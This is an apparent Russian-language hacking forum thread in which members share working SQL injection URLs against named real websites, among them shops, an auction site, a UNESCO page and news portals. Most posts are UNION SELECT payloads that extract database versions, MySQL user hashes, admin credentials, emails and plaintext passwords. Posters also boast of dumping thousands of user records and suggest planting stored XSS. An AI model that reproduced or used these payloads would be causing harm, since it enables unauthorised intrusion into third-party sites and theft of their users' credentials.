SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.sequelvc.com/index.php?page=news&id=843+union+select+concat(database(),0x3a,version()),2/*
    Code:
    http://www.vingarbutt.com/index.php?page=news&more=1&id=-69+union+select+1,2,3,4,5,6,7,email,9,10+from+users+limit+5/*
    Code:
    http://www.iratiwanti.org/iratiwanti.php3?page=news&id=-242+union+select+1,2,3,4,5,6,7,8,9/*
     
    1 person likes this.
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    У меня все выводиться
    лимитом перебираем таблицы, подом колонки получаем базу.
    управление:Opera 9.10
     
    5 people like this.
  3. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Constantine, а из таблицы admin почему тогда данные не выводятся? Таблица присутствует:
    Code:
    http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12%20+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    Так что извиняй, это не то что хотелось бы. Дело в том, что даже простое обращение типа вот этого:
    Code:
    http://www.marycoughlanmusic.com/shop.php?id=-47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
    Уже не работает!
     
    #1743 ShadOS, 8 Apr 2007
    Last edited: 8 Apr 2007
  4. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Опять времени много =)

    Цель - www.gamesplay.ru

    Заходим по первой попавшейся ссылке. Видно, что движок самописный... Сразу же начинаем пихать левые параметры...

    Название игры не меняется, так как за вывод названия отвечает другая переменная. Меняется само описание, так что все ок!

    Подбираем стотлбцы и зануляем запрос.

    Теперь пробуем вывести чуток данных из таблицы.

    Облом, други! Но мы то с вами не так себе, прорвемся! ;)

    Теперь все ок. Ну а дальше...

    Итак, финал!

    login : md5(pass) : mail : icq

    PS Пользователей не считал, но очень много =)
     
    1 person likes this.
  5. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.generationsims2.com

    фанатам Sims 2 посвящаеться:

    Code:
    http://www.generationsims2.com/news_com.php?idnews=-1+union+select+1,concat(user_id,0x3a,user_password),3,4,5+from+phpbb_users/*
     
  6. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    самара =\
     
    3 people like this.
  7. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,database(),2,3,5,6,7,8,9/*
    http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,version(),2,3,5,6,7,8,9/*
    http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+UNION+SELECT+1,user(),2,3,5,6,7,8,9/*
    http://www.zhambyl.kz/main.php?action=news&full=2&lan=eng&text_type=-1+union+select+1,password,3,4,5,6,7,8,9+from+mysql.user/*
     
    3 people like this.
  8. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://www.elementemag.com/detail.php?page=news&id=14+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+mysql.user+limit+2/*
     
    2 people like this.
  9. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    считать их не надо :D они вычисляются тем же самым limit'ом,юзеров 13549 ;)
     
    1 person likes this.
  10. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Code:
    http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    
    мертвая скуля...
     
  11. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    в каком плане мертвая? вроде выводит все
    Code:
    http://z04.kazantipa.net/index.php?m1=1&m0=8&act=TopicLover&id=-430+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13/*
     
    1 person likes this.
  12. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    я там ни одной таблицы не нашел...
     
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Вернусь к нашим "баранам"
    Shados. Я сильно подозреваю что полезная инфа береться из таблицы users, она там есть
    Но вот при запросе к ней ругаеться что нет такой таблицы=\
    Щас еще посмотрю
     
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    просто база другая
    Code:
    http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8,9,10,11,12+from+shoutout_marycoughlan_db.users/*
    2maxster
    как вариант можно предложить активную xss в поле ника, создаешь фотку и в поле ника пишешь код.
    пример:
    Code:
    http://z04.kazantipa.net/index.php?m0=8&m1=1
     
    #1754 }{0TT@БЬ)Ч, 8 Apr 2007
    Last edited: 8 Apr 2007
    7 people like this.
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.sinotruck.ru/index.php?t=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17/*
    Code:
    http://www.musagetes.kz/konkurs/text_more.php?cid=5&tid=-1+union+select+1,2,3,concat(user(),char(58),version()),5,6,7/*
     
    4 people like this.
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    www.npstoik.ru


    «Современные Технологии
    в Образовании и Культуре» :
    Code:
    http://www.npstoik.ru/vio/inside.php?ind=news2&key_news=-87+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5/*
     
    2 people like this.
  17. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    www.prom.kz (Каталог предприятий)
    Code:
    http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19,20+from+bx_prom_user+limit+2,1/*
    http://www.prom.kz/modules/articles/article.php?id=-3+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20+from+INFORMATION_SCHEMA.TABLES+limit+34,1/*
     
    4 people like this.
  18. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    http://lotok.com.ua
    интернет-аукцион
    таблицы: (99 шт.)
    Code:
    http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+table_name+from+information_schema.tables+limit+36,1/*
    таблица юзеров #1
    Code:
    http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(login,0x3a,password,0x3a,email)+from+ppusers+limit+0,1/*
    #2
    Code:
    http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_users/*
    админ:
    Code:
    http://lotok.com.ua/auctiondetails.php?id=-1'+union+select+concat(username,0x3a,password)+from+probid_admins/*
    все пароли в MD5, пока не расшифровал)
    Аукцион мб не особо крупный, но инфы в таблицах очень много.
     
    #1758 n1†R0x, 8 Apr 2007
    Last edited: 8 Apr 2007
    4 people like this.
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Вот собсна.. раскручена полностью. думаю вполне даже паблик)

    так же есть таблица users
     
    #1759 Constantine, 8 Apr 2007
    Last edited: 8 Apr 2007
    3 people like this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Центр маркетингово-аналитических исследований
    Code:
    http://www.cmar.kz/index.php?id=15&PageLevelID=-154+union+select+user+from+mysql.user
    таблица (password) есть но не выводится:)
    Code:
    http://www.women.unesco.kz/base.php?id=-4+union+select+concat(login,0x3a,pwd)+from+users+limit+4,1/*
    пассы в чистом виде
     
    #1760 XTErner, 8 Apr 2007
    Last edited: 8 Apr 2007
    2 people like this.
Thread Status:
Not open for further replies.